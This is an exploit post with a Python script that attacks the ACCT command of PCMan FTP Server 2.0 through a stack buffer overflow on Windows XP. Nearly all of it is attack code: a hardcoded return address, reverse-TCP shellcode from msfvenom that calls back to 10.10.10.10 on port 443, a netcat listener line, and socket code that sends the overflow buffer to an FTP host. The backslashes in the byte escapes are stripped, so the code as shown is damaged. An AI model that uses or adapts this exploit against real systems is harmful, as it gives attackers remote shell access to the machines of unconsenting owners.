PCMan FTP Server 2.0 ACCT Buffer Overflow
Posted on 05 November 2016
#!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: PCMan FTP Server 2.0 ACCT Command Buffer Overflow Exploit # Date: 3/11/2016 # Exploit Author: Cybernetic # Version: 2.0 # Tested on: Windows XP Profesional SP3 ESP x86 # CVE : N/A import socket, os, sys ret="xC7x31x6Bx7E" #Shell32.dll 7E6B31C7 #Metasploit Shellcode #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b 'x00x0ax0d' -f c #nc -lvp 443 #Send exploit shellcode=("xbaxacx84x20xa3xdaxc7xd9x74x24xf4x5fx2bxc9xb1" "x52x31x57x12x83xc7x04x03xfbx8axc2x56xffx7bx80" "x99xffx7bxe5x10x1ax4ax25x46x6fxfdx95x0cx3dxf2" "x5ex40xd5x81x13x4dxdax22x99xabxd5xb3xb2x88x74" "x30xc9xdcx56x09x02x11x97x4ex7fxd8xc5x07x0bx4f" "xf9x2cx41x4cx72x7ex47xd4x67x37x66xf5x36x43x31" "xd5xb9x80x49x5cxa1xc5x74x16x5ax3dx02xa9x8ax0f" "xebx06xf3xbfx1ex56x34x07xc1x2dx4cx7bx7cx36x8b" "x01x5axb3x0fxa1x29x63xebx53xfdxf2x78x5fx4ax70" "x26x7cx4dx55x5dx78xc6x58xb1x08x9cx7ex15x50x46" "x1ex0cx3cx29x1fx4ex9fx96x85x05x32xc2xb7x44x5b" "x27xfax76x9bx2fx8dx05xa9xf0x25x81x81x79xe0x56" "xe5x53x54xc8x18x5cxa5xc1xdex08xf5x79xf6x30x9e" "x79xf7xe4x31x29x57x57xf2x99x17x07x9axf3x97x78" "xbaxfcx7dx11x51x07x16xdex0ex06xa1xb6x4cx08x2c" "xfcxd8xeex44x12x8dxb9xf0x8bx94x31x60x53x03x3c" "xa2xdfxa0xc1x6dx28xccxd1x1axd8x9bx8bx8dxe7x31" "xa3x52x75xdex33x1cx66x49x64x49x58x80xe0x67xc3" "x3ax16x7ax95x05x92xa1x66x8bx1bx27xd2xafx0bxf1" "xdbxebx7fxadx8dxa5x29x0bx64x04x83xc5xdbxcex43" "x93x17xd1x15x9cx7dxa7xf9x2dx28xfex06x81xbcxf6" "x7fxffx5cxf8xaaxbbx6dxb3xf6xeaxe5x1ax63xafx6b" "x9dx5execx95x1ex6ax8dx61x3ex1fx88x2exf8xccxe0" "x3fx6dxf2x57x3fxa4") shell= 'x90'*30 + shellcode buffer='x41'*2007+ ret + shell + 'x43'*(696-len(shell)) print "Sending Buffer" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('10.10.1.10',21)) s.recv(1024) s.send('USER anonymous ') s.recv(1024) s.send('PASS anonymous ') s.recv(1024) s.send('ACCT' +buffer+ ' ') s.close() print "Attack Buffer Overflow Successfully Executed"
